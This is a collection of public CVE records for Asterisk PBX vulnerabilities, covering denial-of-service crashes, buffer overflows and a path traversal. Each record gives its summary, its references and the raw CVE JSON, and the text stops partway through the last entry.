Vulnerability from cvelistv5

Published

2014-11-26 15:00

Modified

2024-08-06 12:24

Severity ?

Summary

The res_pjsip_pubsub module in Asterisk Open Source 12.x before 12.5.1 allows remote authenticated users to cause a denial of service (crash) via crafted headers in a SIP SUBSCRIBE request for an event package.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-009.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T12:24:34.015Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-009.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-09-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The res_pjsip_pubsub module in Asterisk Open Source 12.x before 12.5.1 allows remote authenticated users to cause a denial of service (crash) via crafted headers in a SIP SUBSCRIBE request for an event package."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-11-26T13:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-009.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-6609",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The res_pjsip_pubsub module in Asterisk Open Source 12.x before 12.5.1 allows remote authenticated users to cause a denial of service (crash) via crafted headers in a SIP SUBSCRIBE request for an event package."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-009.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-009.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-6609",
    "datePublished": "2014-11-26T15:00:00",
    "dateReserved": "2014-09-18T00:00:00",
    "dateUpdated": "2024-08-06T12:24:34.015Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2006-1827

Vulnerability from cvelistv5

Published

2006-04-18 20:00

Modified

2024-08-07 17:27

Severity ?

Summary

Integer signedness error in format_jpeg.c in Asterisk 1.2.6 and earlier allows remote attackers to execute arbitrary code via a length value that passes a length check as a negative number, but triggers a buffer overflow when it is used as an unsigned length.

References

▼	URL	Tags
	http://secunia.com/advisories/19872	third-party-advisory, x_refsource_SECUNIA
	http://www.vupen.com/english/advisories/2006/1478	vdb-entry, x_refsource_VUPEN
	http://www.cipher.org.uk/index.php?p=advisories/Asterisk_Codec_Integer_Overflow_07-04-2006.advisory	x_refsource_MISC
	http://www.debian.org/security/2006/dsa-1048	vendor-advisory, x_refsource_DEBIAN
	http://www.securityfocus.com/bid/17561	vdb-entry, x_refsource_BID
	http://ftp.digium.com/pub/asterisk/releases/asterisk-1.2.7-patch.gz	x_refsource_CONFIRM
	http://secunia.com/advisories/19800	third-party-advisory, x_refsource_SECUNIA
	http://secunia.com/advisories/19897	third-party-advisory, x_refsource_SECUNIA
	http://www.novell.com/linux/security/advisories/2006_04_28.html	vendor-advisory, x_refsource_SUSE

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T17:27:29.111Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "19872",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19872"
          },
          {
            "name": "ADV-2006-1478",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1478"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.cipher.org.uk/index.php?p=advisories/Asterisk_Codec_Integer_Overflow_07-04-2006.advisory"
          },
          {
            "name": "DSA-1048",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2006/dsa-1048"
          },
          {
            "name": "17561",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/17561"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://ftp.digium.com/pub/asterisk/releases/asterisk-1.2.7-patch.gz"
          },
          {
            "name": "19800",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19800"
          },
          {
            "name": "19897",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19897"
          },
          {
            "name": "SUSE-SR:2006:009",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://www.novell.com/linux/security/advisories/2006_04_28.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-04-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Integer signedness error in format_jpeg.c in Asterisk 1.2.6 and earlier allows remote attackers to execute arbitrary code via a length value that passes a length check as a negative number, but triggers a buffer overflow when it is used as an unsigned length."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2006-04-28T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "19872",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19872"
        },
        {
          "name": "ADV-2006-1478",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1478"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.cipher.org.uk/index.php?p=advisories/Asterisk_Codec_Integer_Overflow_07-04-2006.advisory"
        },
        {
          "name": "DSA-1048",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2006/dsa-1048"
        },
        {
          "name": "17561",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/17561"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://ftp.digium.com/pub/asterisk/releases/asterisk-1.2.7-patch.gz"
        },
        {
          "name": "19800",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19800"
        },
        {
          "name": "19897",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19897"
        },
        {
          "name": "SUSE-SR:2006:009",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://www.novell.com/linux/security/advisories/2006_04_28.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-1827",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Integer signedness error in format_jpeg.c in Asterisk 1.2.6 and earlier allows remote attackers to execute arbitrary code via a length value that passes a length check as a negative number, but triggers a buffer overflow when it is used as an unsigned length."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "19872",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19872"
            },
            {
              "name": "ADV-2006-1478",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1478"
            },
            {
              "name": "http://www.cipher.org.uk/index.php?p=advisories/Asterisk_Codec_Integer_Overflow_07-04-2006.advisory",
              "refsource": "MISC",
              "url": "http://www.cipher.org.uk/index.php?p=advisories/Asterisk_Codec_Integer_Overflow_07-04-2006.advisory"
            },
            {
              "name": "DSA-1048",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2006/dsa-1048"
            },
            {
              "name": "17561",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/17561"
            },
            {
              "name": "http://ftp.digium.com/pub/asterisk/releases/asterisk-1.2.7-patch.gz",
              "refsource": "CONFIRM",
              "url": "http://ftp.digium.com/pub/asterisk/releases/asterisk-1.2.7-patch.gz"
            },
            {
              "name": "19800",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19800"
            },
            {
              "name": "19897",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19897"
            },
            {
              "name": "SUSE-SR:2006:009",
              "refsource": "SUSE",
              "url": "http://www.novell.com/linux/security/advisories/2006_04_28.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-1827",
    "datePublished": "2006-04-18T20:00:00",
    "dateReserved": "2006-04-18T00:00:00",
    "dateUpdated": "2024-08-07T17:27:29.111Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2020-35776

Vulnerability from cvelistv5

Published

2021-02-18 19:57

Modified

2024-08-04 17:09

Severity ?

Summary

A buffer overflow in res_pjsip_diversion.c in Sangoma Asterisk versions 13.38.1, 16.15.1, 17.9.1, and 18.1.1 allows remote attacker to crash Asterisk by deliberately misusing SIP 181 responses.

References

▼	URL	Tags
	https://issues.asterisk.org/	x_refsource_MISC
	http://seclists.org/fulldisclosure/2021/Feb/57	mailing-list, x_refsource_FULLDISC
	https://downloads.asterisk.org/pub/security/AST-2021-001.html	x_refsource_CONFIRM
	https://issues.asterisk.org/jira/browse/ASTERISK-29227	x_refsource_CONFIRM
	http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T17:09:15.196Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/"
          },
          {
            "name": "20210218 AST-2021-001: Remote crash in res_pjsip_diversion",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2021/Feb/57"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2021-001.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29227"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A buffer overflow in res_pjsip_diversion.c in Sangoma Asterisk versions 13.38.1, 16.15.1, 17.9.1, and 18.1.1 allows remote attacker to crash Asterisk by deliberately misusing SIP 181 responses."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-02-19T15:06:11",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/"
        },
        {
          "name": "20210218 AST-2021-001: Remote crash in res_pjsip_diversion",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2021/Feb/57"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2021-001.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29227"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-35776",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A buffer overflow in res_pjsip_diversion.c in Sangoma Asterisk versions 13.38.1, 16.15.1, 17.9.1, and 18.1.1 allows remote attacker to crash Asterisk by deliberately misusing SIP 181 responses."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://issues.asterisk.org/",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/"
            },
            {
              "name": "20210218 AST-2021-001: Remote crash in res_pjsip_diversion",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2021/Feb/57"
            },
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2021-001.html",
              "refsource": "CONFIRM",
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-001.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29227",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29227"
            },
            {
              "name": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/161470/Asterisk-Project-Security-Advisory-AST-2021-001.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-35776",
    "datePublished": "2021-02-18T19:57:57",
    "dateReserved": "2020-12-29T00:00:00",
    "dateUpdated": "2024-08-04T17:09:15.196Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-13161

Vulnerability from cvelistv5

Published

2019-07-12 19:24

Modified

2024-08-04 23:41

Severity ?

Summary

An issue was discovered in Asterisk Open Source through 13.27.0, 14.x and 15.x through 15.7.2, and 16.x through 16.4.0, and Certified Asterisk through 13.21-cert3. A pointer dereference in chan_sip while handling SDP negotiation allows an attacker to crash Asterisk when handling an SDP answer to an outgoing T.38 re-invite. To exploit this vulnerability an attacker must cause the chan_sip module to send a T.38 re-invite request to them. Upon receipt, the attacker must send an SDP answer containing both a T.38 UDPTL stream and another media stream containing only a codec (which is not permitted according to the chan_sip configuration).

References

▼	URL	Tags
	http://downloads.digium.com/pub/security/AST-2019-003.html	x_refsource_CONFIRM
	https://issues.asterisk.org/jira/browse/ASTERISK-28465	x_refsource_CONFIRM
	https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html	mailing-list, x_refsource_MLIST
	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	mailing-list, x_refsource_MLIST

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T23:41:10.494Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2019-003.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28465"
          },
          {
            "name": "[debian-lts-announce] 20191130 [SECURITY] [DLA 2017-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
          },
          {
            "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2019-06-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Asterisk Open Source through 13.27.0, 14.x and 15.x through 15.7.2, and 16.x through 16.4.0, and Certified Asterisk through 13.21-cert3. A pointer dereference in chan_sip while handling SDP negotiation allows an attacker to crash Asterisk when handling an SDP answer to an outgoing T.38 re-invite. To exploit this vulnerability an attacker must cause the chan_sip module to send a T.38 re-invite request to them. Upon receipt, the attacker must send an SDP answer containing both a T.38 UDPTL stream and another media stream containing only a codec (which is not permitted according to the chan_sip configuration)."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-03T07:06:09",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2019-003.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28465"
        },
        {
          "name": "[debian-lts-announce] 20191130 [SECURITY] [DLA 2017-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
        },
        {
          "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-13161",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Asterisk Open Source through 13.27.0, 14.x and 15.x through 15.7.2, and 16.x through 16.4.0, and Certified Asterisk through 13.21-cert3. A pointer dereference in chan_sip while handling SDP negotiation allows an attacker to crash Asterisk when handling an SDP answer to an outgoing T.38 re-invite. To exploit this vulnerability an attacker must cause the chan_sip module to send a T.38 re-invite request to them. Upon receipt, the attacker must send an SDP answer containing both a T.38 UDPTL stream and another media stream containing only a codec (which is not permitted according to the chan_sip configuration)."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.digium.com/pub/security/AST-2019-003.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2019-003.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-28465",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28465"
            },
            {
              "name": "[debian-lts-announce] 20191130 [SECURITY] [DLA 2017-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
            },
            {
              "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-13161",
    "datePublished": "2019-07-12T19:24:37",
    "dateReserved": "2019-07-02T00:00:00",
    "dateUpdated": "2024-08-04T23:41:10.494Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-49294

Vulnerability from cvelistv5

Published

2023-12-14 19:40

Modified

2025-02-13 17:18

Severity ?

4.9 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Summary

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.

References

▼	URL	Tags
	https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f	x_refsource_CONFIRM
	https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5	x_refsource_MISC
	https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757	x_refsource_MISC
	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html

Impacted products

	Vendor	Product	Version
	asterisk	asterisk	Version: < 18.20.1 Version: >= 19.0.0, < 20.5.1 Version: = 21.0.0 Version: < 18.9-cert6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T21:53:45.375Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
          },
          {
            "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
          },
          {
            "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "asterisk",
          "vendor": "asterisk",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 18.20.1"
            },
            {
              "status": "affected",
              "version": "\u003e= 19.0.0, \u003c 20.5.1"
            },
            {
              "status": "affected",
              "version": "= 21.0.0"
            },
            {
              "status": "affected",
              "version": "\u003c 18.9-cert6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-29T00:06:21.896Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
        },
        {
          "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
        },
        {
          "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
        }
      ],
      "source": {
        "advisory": "GHSA-8857-hfmw-vg8f",
        "discovery": "UNKNOWN"
      },
      "title": "Asterisk Path Traversal vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-49294",
    "datePublished": "2023-12-14T19:40:46.157Z",
    "dateReserved": "2023-11-24T16:45:24.314Z",
    "dateUpdated": "2025-02-13T17:18:40.277Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-37457

Vulnerability from cvelistv5

Published

2023-12-14 19:43

Modified

2025-02-13 17:01

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.

References

▼	URL	Tags
